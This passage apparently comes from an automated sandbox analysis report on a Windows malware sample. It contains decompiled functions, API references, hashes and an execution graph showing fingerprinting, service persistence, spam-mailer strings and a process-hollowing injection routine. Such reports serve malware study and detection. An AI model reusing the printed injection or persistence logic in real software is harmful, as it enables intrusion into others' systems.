				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}









                                                                                0x00401b7e
                                                                                0x00401b84
                                                                                0x00401b85
                                                                                0x00401b86
                                                                                0x00401b87
                                                                                0x00401b89
                                                                                0x00401b8c
                                                                                0x00401b8d
                                                                                0x00401b94
                                                                                0x00401ba3
                                                                                0x00401bb8
                                                                                0x00401bc8
                                                                                0x00401bca
                                                                                0x00401bcd
                                                                                0x00000000
                                                                                0x00401bd8
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401BA3
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: localcfg
                                                                                • API String ID: 2777991786-1857712256
                                                                                • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AB81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x413640);
							} else {
								_t17 = InterlockedIncrement(0x41363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}







                                                                                0x0040ab85
                                                                                0x0040ab8a
                                                                                0x0040ab94
                                                                                0x0040ab97
                                                                                0x0040ab9a
                                                                                0x0040aba0
                                                                                0x0040abab
                                                                                0x0040abb9
                                                                                0x0040abc4
                                                                                0x0040abca
                                                                                0x0040abd3
                                                                                0x0040abe1
                                                                                0x0040abd5
                                                                                0x0040abe1
                                                                                0x0040abe1
                                                                                0x0040abe1
                                                                                0x0040abe3
                                                                                0x0040abe4
                                                                                0x00000000
                                                                                0x0040abea
                                                                                0x0040abed

                                                                                APIs
                                                                                • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: IncrementInterlockedlstrcpyn
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 224340156-2903620461
                                                                                • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004026B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbyaddrinet_ntoa
                                                                                • String ID: localcfg
                                                                                • API String ID: 2112563974-1857712256
                                                                                • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg
                                                                                • API String ID: 1594361348-2401304539
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EAE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4;
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




                                                                                0x0040eae4
                                                                                0x0040eaeb
                                                                                0x0040eb02
                                                                                0x0040eb0d
                                                                                0x0040eaed
                                                                                0x0040eaf2
                                                                                0x0040eaf8
                                                                                0x0040eaff
                                                                                0x00000000
                                                                                0x0040eb01
                                                                                0x0040eb01
                                                                                0x0040eb01
                                                                                0x0040eaff

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000), ref: 0040EAF2
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 2574300362-2227199552
                                                                                • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402F22 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

































                                                                                0x00402f2e
                                                                                0x00402f34
                                                                                0x00402f36
                                                                                0x00402f3d
                                                                                0x00402f42
                                                                                0x00402f4d
                                                                                0x00402f88
                                                                                0x00402f8b
                                                                                0x00402f8e
                                                                                0x00402f93
                                                                                0x00402f93
                                                                                0x00402f96
                                                                                0x00402f98
                                                                                0x00402f9b
                                                                                0x00402f9e
                                                                                0x00402f9e
                                                                                0x00402fa0
                                                                                0x00402fa1
                                                                                0x00402fae
                                                                                0x00402fb3
                                                                                0x00402fb7
                                                                                0x00402fbe
                                                                                0x00402fc1
                                                                                0x00402fc3
                                                                                0x00402fc5
                                                                                0x00402fca
                                                                                0x00402fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402fcd
                                                                                0x00402fdb
                                                                                0x00402fe3
                                                                                0x00402fe8
                                                                                0x004030ad
                                                                                0x00000000
                                                                                0x004030af
                                                                                0x00402ff3
                                                                                0x00402ff4
                                                                                0x00402ff7
                                                                                0x00402ff9
                                                                                0x00402ffd
                                                                                0x00403001
                                                                                0x00403017
                                                                                0x0040301a
                                                                                0x00403021
                                                                                0x00403028
                                                                                0x0040302b
                                                                                0x0040302e
                                                                                0x00403031
                                                                                0x00403034
                                                                                0x00403034
                                                                                0x00403036
                                                                                0x00403037
                                                                                0x00403049
                                                                                0x00403051
                                                                                0x00403054
                                                                                0x00403057
                                                                                0x00403059
                                                                                0x0040305c
                                                                                0x0040305c
                                                                                0x0040305e
                                                                                0x0040305f
                                                                                0x0040306b
                                                                                0x00403070
                                                                                0x00403076
                                                                                0x00403079
                                                                                0x0040307c
                                                                                0x0040307c
                                                                                0x0040307e
                                                                                0x0040307f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403003
                                                                                0x00403003
                                                                                0x0040300d
                                                                                0x0040300f
                                                                                0x0040300f
                                                                                0x0040300f
                                                                                0x00403012
                                                                                0x00403013
                                                                                0x00000000
                                                                                0x00403083
                                                                                0x0040308f
                                                                                0x00403094
                                                                                0x0040309d
                                                                                0x004030a0
                                                                                0x004030a3
                                                                                0x004030a4
                                                                                0x00000000
                                                                                0x00402ff7
                                                                                0x00402f4f
                                                                                0x00402f4f
                                                                                0x00402f52
                                                                                0x00402f54
                                                                                0x00402f54
                                                                                0x00402f57
                                                                                0x00402f57
                                                                                0x00402f59
                                                                                0x00402f5a
                                                                                0x00402f66
                                                                                0x00402f6e
                                                                                0x00402f7a
                                                                                0x00000000
                                                                                0x00402f7a
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                  • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02083189 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02082F88: GetModuleHandleA.KERNEL32(?), ref: 02082FA1
                                                                                  • Part of subcall function 02082F88: LoadLibraryA.KERNEL32(?), ref: 02082FB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 020831DA
                                                                                • HeapFree.KERNEL32(00000000), ref: 020831E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                • Instruction ID: 9af67915a81f682cb6152b7de1d3b9b56323341f0991eaeefa239b0316db8274
                                                                                • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                • Instruction Fuzzy Hash: 48519A3190034AAFCF02AF64D888AFAB7B5FF55705F1441A9EC96C7210E7329A19DB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:2.7%
                                                                                Dynamic/Decrypted Code Coverage:22.1%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1034
                                                                                Total number of Limit Nodes:12
                                                                                execution_graph 14472 409961 RegisterServiceCtrlHandlerA 14473 40997d 14472->14473 14480 4099cb 14472->14480 14482 409892 14473->14482 14475 40999a 14476 4099ba 14475->14476 14477 409892 SetServiceStatus 14475->14477 14478 409892 SetServiceStatus 14476->14478 14476->14480 14479 4099aa 14477->14479 14478->14480 14479->14476 14485 4098f2 14479->14485 14483 4098c2 SetServiceStatus 14482->14483 14483->14475 14486 4098f6 14485->14486 14488 409904 Sleep 14486->14488 14490 409917 14486->14490 14493 404280 CreateEventA 14486->14493 14488->14486 14489 409915 14488->14489 14489->14490 14492 409947 14490->14492 14520 40977c 14490->14520 14492->14476 14494 4042a5 14493->14494 14495 40429d 14493->14495 14534 403ecd 14494->14534 14495->14486 14497 4042b0 14538 404000 14497->14538 14500 4043c1 CloseHandle 14500->14495 14501 4042ce 14544 403f18 WriteFile 14501->14544 14506 4043ba CloseHandle 14506->14500 14507 404318 14508 403f18 4 API calls 14507->14508 14509 404331 14508->14509 14510 403f18 4 API calls 14509->14510 14511 40434a 14510->14511 14552 40ebcc GetProcessHeap HeapAlloc 14511->14552 14514 403f18 4 API calls 14515 404389 14514->14515 14555 40ec2e 14515->14555 14518 403f8c 4 API calls 14519 40439f CloseHandle CloseHandle 14518->14519 14519->14495 14584 40ee2a 14520->14584 14523 4097c2 14525 4097d4 GetThreadContext 14523->14525 14524 4097bb 14524->14492 14526 409801 14525->14526 14527 4097f5 14525->14527 14586 40637c 14526->14586 14528 4097f6 TerminateProcess 14527->14528 14528->14524 14530 409816 14530->14528 14531 40981e WriteProcessMemory 14530->14531 14531->14527 14532 40983b SetThreadContext 14531->14532 14532->14527 14533 409858 ResumeThread 14532->14533 14533->14524 14535 403ee2 14534->14535 14536 403edc 14534->14536 14535->14497 14560 406dc2 14536->14560 14539 40400b CreateFileA 14538->14539 14540 40402c GetLastError 14539->14540 14541 404052 14539->14541 14540->14541 14542 404037 14540->14542 14541->14495 14541->14500 14541->14501 14542->14541 14543 404041 Sleep 14542->14543 14543->14539 14543->14541 14545 403f7c 14544->14545 14546 403f4e GetLastError 14544->14546 14548 403f8c ReadFile 14545->14548 14546->14545 14547 403f5b WaitForSingleObject GetOverlappedResult 14546->14547 14547->14545 14549 403ff0 14548->14549 14550 403fc2 GetLastError 14548->14550 14549->14506 14549->14507 14550->14549 14551 403fcf WaitForSingleObject GetOverlappedResult 14550->14551 14551->14549 14578 40eb74 14552->14578 14556 40ec37 14555->14556 14557 40438f 14555->14557 14581 40eba0 14556->14581 14557->14518 14561 406dd7 14560->14561 14565 406e24 14560->14565 14566 406cc9 14561->14566 14563 406ddc 14564 406e02 GetVolumeInformationA 14563->14564 14563->14565 14564->14565 14565->14535 14567 406cdc GetModuleHandleA GetProcAddress 14566->14567 14568 406dbe 14566->14568 14569 406d12 GetSystemDirectoryA 14567->14569 14570 406cfd 14567->14570 14568->14563 14571 406d27 GetWindowsDirectoryA 14569->14571 14572 406d1e 14569->14572 14570->14569 14573 406d8b 14570->14573 14574 406d42 14571->14574 14572->14571 14572->14573 14573->14568 14576 40ef1e lstrlenA 14574->14576 14577 40ef32 14576->14577 14577->14573 14579 40eb7b GetProcessHeap HeapSize 14578->14579 14580 404350 14578->14580 14579->14580 14580->14514 14582 40eba7 GetProcessHeap HeapSize 14581->14582 14583 40ebbf GetProcessHeap HeapFree 14581->14583 14582->14583 14583->14557 14585 409794 CreateProcessA 14584->14585 14585->14523 14585->14524 14587 406386 14586->14587 14588 40638a GetModuleHandleA VirtualAlloc 14586->14588 14587->14530 14589 4063b6 14588->14589 14593 4063f5 14588->14593 14590 4063be VirtualAllocEx 14589->14590 14591 4063d6 14590->14591 14590->14593 14592 4063df WriteProcessMemory 14591->14592 14592->14593 14593->14530 14623 409a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 14740 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 14623->14740 14625 409a95 14626 409aa3 GetModuleHandleA GetModuleFileNameA 14625->14626 14631 40a3c7 14625->14631 14638 409ac4 14626->14638 14627 40a41c CreateThread WSAStartup 14851 40e52e 14627->14851 14628 40a406 DeleteFileA 14628->14631 14632 40a40d 14628->14632 14630 409afd GetCommandLineA 14639 409b22 14630->14639 14631->14627 14631->14628 14631->14632 14634 40a3ed GetLastError 14631->14634 14632->14627 14633 40a445 14870 40eaaf 14633->14870 14634->14632 14636 40a3f8 Sleep 14634->14636 14636->14628 14637 40a44d 14874 401d96 14637->14874 14638->14630 14644 409c0c 14639->14644 14650 409b47 14639->14650 14641 40a457 14922 4080c9 14641->14922 14741 4096aa 14644->14741 14654 409b96 lstrlenA 14650->14654 14656 409b58 14650->14656 14651 40a1d2 14657 40a1e3 GetCommandLineA 14651->14657 14652 409c39 14655 40a167 GetModuleHandleA GetModuleFileNameA 14652->14655 14661 409c4b 14652->14661 14654->14656 14659 409c05 ExitProcess 14655->14659 14660 40a189 14655->14660 14656->14659 14664 409bd2 14656->14664 14685 40a205 14657->14685 14660->14659 14669 40a1b2 GetDriveTypeA 14660->14669 14661->14655 14663 404280 30 API calls 14661->14663 14666 409c5b 14663->14666 14753 40675c 14664->14753 14666->14655 14672 40675c 21 API calls 14666->14672 14669->14659 14671 40a1c5 14669->14671 14843 409145 GetModuleHandleA GetModuleFileNameA CharToOemA 14671->14843 14674 409c79 14672->14674 14674->14655 14679 409ca0 GetTempPathA 14674->14679 14680 409e3e 14674->14680 14676 409bff 14676->14659 14677 40a491 14678 40a49f GetTickCount 14677->14678 14681 40a4be Sleep 14677->14681 14684 40a4b7 GetTickCount 14677->14684 14968 40c913 14677->14968 14678->14677 14678->14681 14679->14680 14683 409cba 14679->14683 14691 409e6b GetEnvironmentVariableA 14680->14691 14692 409e04 14680->14692 14681->14677 14791 4099d2 lstrcpyA 14683->14791 14684->14681 14688 40a285 lstrlenA 14685->14688 14696 40a239 14685->14696 14687 40ec2e codecvt 4 API calls 14690 40a15d 14687->14690 14688->14696 14690->14655 14690->14659 14691->14692 14693 409e7d 14691->14693 14692->14687 14694 4099d2 16 API calls 14693->14694 14695 409e9d 14694->14695 14695->14692 14701 409eb0 lstrcpyA lstrlenA 14695->14701 14749 406ec3 14696->14749 14697 406dc2 6 API calls 14698 409d5f 14697->14698 14703 406cc9 5 API calls 14698->14703 14700 40a3c2 14704 4098f2 41 API calls 14700->14704 14702 409ef4 14701->14702 14705 406dc2 6 API calls 14702->14705 14708 409f03 14702->14708 14707 409d72 lstrcpyA lstrcatA lstrcatA 14703->14707 14704->14631 14705->14708 14706 40a39d StartServiceCtrlDispatcherA 14706->14700 14710 409cf6 14707->14710 14709 409f32 RegOpenKeyExA 14708->14709 14712 409f48 RegSetValueExA RegCloseKey 14709->14712 14715 409f70 14709->14715 14798 409326 14710->14798 14711 40a35f 14711->14700 14711->14706 14712->14715 14720 409f9d GetModuleHandleA GetModuleFileNameA 14715->14720 14716 409e0c DeleteFileA 14716->14680 14717 409dde GetFileAttributesExA 14717->14716 14718 409df7 14717->14718 14718->14692 14835 4096ff 14718->14835 14722 409fc2 14720->14722 14723 40a093 14720->14723 14722->14723 14729 409ff1 GetDriveTypeA 14722->14729 14724 40a103 CreateProcessA 14723->14724 14725 40a0a4 wsprintfA 14723->14725 14726 40a13a 14724->14726 14727 40a12a DeleteFileA 14724->14727 14841 402544 14725->14841 14726->14692 14733 4096ff 3 API calls 14726->14733 14727->14726 14729->14723 14731 40a00d 14729->14731 14735 40a02d lstrcatA 14731->14735 14732 40ee2a 14734 40a0ec lstrcatA 14732->14734 14733->14692 14734->14724 14736 40a046 14735->14736 14737 40a052 lstrcatA 14736->14737 14738 40a064 lstrcatA 14736->14738 14737->14738 14738->14723 14739 40a081 lstrcatA 14738->14739 14739->14723 14740->14625 14742 4096b9 14741->14742 15071 4073ff 14742->15071 14744 4096e2 14745 4096e9 14744->14745 14746 4096fa 14744->14746 15091 40704c 14745->15091 14746->14651 14746->14652 14748 4096f7 14748->14746 14750 406ecc 14749->14750 14752 406ed5 14749->14752 15116 406e36 GetUserNameW 14750->15116 14752->14711 14754 406784 CreateFileA 14753->14754 14755 40677a SetFileAttributesA 14753->14755 14756 4067a4 CreateFileA 14754->14756 14757 4067b5 14754->14757 14755->14754 14756->14757 14758 4067c5 14757->14758 14759 4067ba SetFileAttributesA 14757->14759 14760 406977 14758->14760 14761 4067cf GetFileSize 14758->14761 14759->14758 14760->14659 14778 406a60 CreateFileA 14760->14778 14762 4067e5 14761->14762 14776 406922 14761->14776 14763 4067ed ReadFile 14762->14763 14762->14776 14765 406811 SetFilePointer 14763->14765 14763->14776 14764 40696e CloseHandle 14764->14760 14766 40682a ReadFile 14765->14766 14765->14776 14767 406848 SetFilePointer 14766->14767 14766->14776 14770 406867 14767->14770 14767->14776 14768 4068d0 14768->14764 14771 40ebcc 4 API calls 14768->14771 14769 406878 ReadFile 14769->14768 14769->14770 14770->14768 14770->14769 14772 4068f8 14771->14772 14773 406900 SetFilePointer 14772->14773 14772->14776 14774 40695a 14773->14774 14775 40690d ReadFile 14773->14775 14777 40ec2e codecvt 4 API calls 14774->14777 14775->14774 14775->14776 14776->14764 14777->14776 14779 406b8c GetLastError 14778->14779 14780 406a8f GetDiskFreeSpaceA 14778->14780 14782 406b86 14779->14782 14781 406ac5 14780->14781 14790 406ad7 14780->14790 15119 40eb0e 14781->15119 14782->14676 14786 406b56 CloseHandle 14786->14782 14789 406b65 GetLastError CloseHandle 14786->14789 14787 406b36 GetLastError CloseHandle 14788 406b7f DeleteFileA 14787->14788 14788->14782 14789->14788 15123 406987 14790->15123 14792 4099eb 14791->14792 14793 409a2f lstrcatA 14792->14793 14794 40ee2a 14793->14794 14795 409a4b lstrcatA 14794->14795 14796 406a60 13 